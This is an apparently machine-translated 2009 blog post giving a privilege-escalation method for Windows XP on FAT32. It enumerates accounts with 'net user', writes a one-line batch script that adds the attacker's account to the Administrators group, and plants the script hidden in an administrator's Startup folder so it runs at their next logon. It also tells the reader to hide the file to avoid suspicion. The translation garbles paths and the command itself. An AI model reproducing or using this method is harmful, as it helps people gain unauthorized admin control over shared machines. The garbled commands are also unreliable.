Kamis, 19 November 2009

Exploitation WINDOWS XP FAT32

dir\system32

Exploitation WINDOWS XP FAT32

Methods of exploitation that will be described only works on Windows XP
using the FAT32 system. Windows XP is FAT32 allows the system files
normal user access from the admin home directory which is usually located
at:

C: \ Documents and Settings \ Administrator \

While in Windows XP that the system is NTFS files, not a regular user
will be able to access the home directory of the admin. If forced then
confirmed by successfully getting out the message

Access Denied

The process of exploitation can be done in a way ...

/ / SEE THE REGISTERED USER

C: \ DOCUME ~ 1 \ mrt> net user

User accounts for \ \ User

-------------------------------------------------- ----------
Administrator Guest mrt
HelpAssistant SUPPORT_388945a0 Win_Xp
The command completed successfully.



SEE USER ACCESS RIGHTS
------------------------

C: \ DOCUME ~ 1 \ mrt> net user Win_Xp
User name Win_Xp
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/9/2005 3:38 PM
Password Never expires
Password changeable 1/9/2005 3:38 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/26/2005 11:16 PM

Logon hours allowed All

Local Group Memberships * Administrators <- discovered access Global Group memberships * None The command completed successfully. Once you know who the user who has admin access, it's time for action. First create a batch script that used to lift our users to be admin. <+ + + + Batchfile>

Administrators localgoup net MRT / add

<- Batchfile ->

after we make the batch script, then save the
directory:

C: \ Documents and Settings \ Win_Xp \ Start Menu \ Programs \ Startup

In order to look more carefully batch script that should be made
hidden. Then mengunggu user has admin access to the
login, after the user has admin access is logged
then the existing user permissions on us going missing replaced
by admin access.

WARNING!
This way admin can invite suspicion, because when
The admin has to login process then he will see a flash
DOS Prompt view that suddenly appeared on the desktop.

Hopefully this article may be "slightly" increase the knowledge of all of us.
Diposting oleh di